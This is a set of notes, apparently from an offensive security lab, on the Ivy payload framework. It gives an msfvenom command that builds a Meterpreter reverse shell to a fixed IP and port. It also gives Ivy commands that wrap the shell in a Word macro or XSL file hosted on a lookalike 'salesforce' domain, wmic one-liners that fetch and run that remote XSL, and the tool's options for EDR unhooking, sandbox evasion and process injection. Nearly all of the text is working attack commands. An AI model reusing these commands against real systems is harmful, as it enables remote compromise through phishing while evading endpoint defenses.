Ivy
Payload Framework
https://github.com/optiv/Ivy
Generate Payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o msf.bin LHOST=172.16.245.16 LPORT=4444Convert to Word Macro:
./Ivy -stageless -Ix64 msf.bin -delivery macro -product Word -unhook -P Local -O ivymsf.txtConvert to Excel File
./Ivy -Ix64 msf.bin -P Local -O Ivy.xsl -url http://salesforce.vmoshpit-lab.com -delivery xsl -stagelessOne liner command to execute it:
wmic computersystem list full /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"wmic computersystem list brief /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"wmic process list brief /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"Usage of ./Ivy: -Ix64 string Path to the x64 payload -Ix86 string Path to the x86 payload -O string Name of output file -P string Payload type "Inject" (Which performs a process injection) or "Local" (Which loads the payload directly into the current process) -debug Print debug statements -delivery string Generates an one-liner command to download and execute the payload remotely: [] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader. [] hta - Generates a blank hta file containing the loader along with a one liner command execute the loader remotely. [] macro - Generates an office macro that would download and execute a the loader remotely. [] xsl - Generates a xsl stylesheet file containing the loader along with a one liner command execute the loader remotely. -process32 string The full path to the x86 application to spawn. Only use applications that are found in System32 & SYSWOW64 (default is rundll32.exe) -process64 string The full path to the x64 application to spawn. Please specify the path to the process to create/inject into (use \ for the path) (default is explorer.exe) -product string Name of the office product to use (Excel, Word, PowerPoint) (default "Excel") -sandbox Enable sandbox evasion controls (i.e. checks if the system is domain joined) -stageless Enables stageless payload. When this option is enabled use a raw payload (aka .bin files) instead of .c code -unhook Unhooks EDR's hooks before loading payload -url string URL assoicated with the Delivery option to retrieve the payload. (e.g https://acme.com/)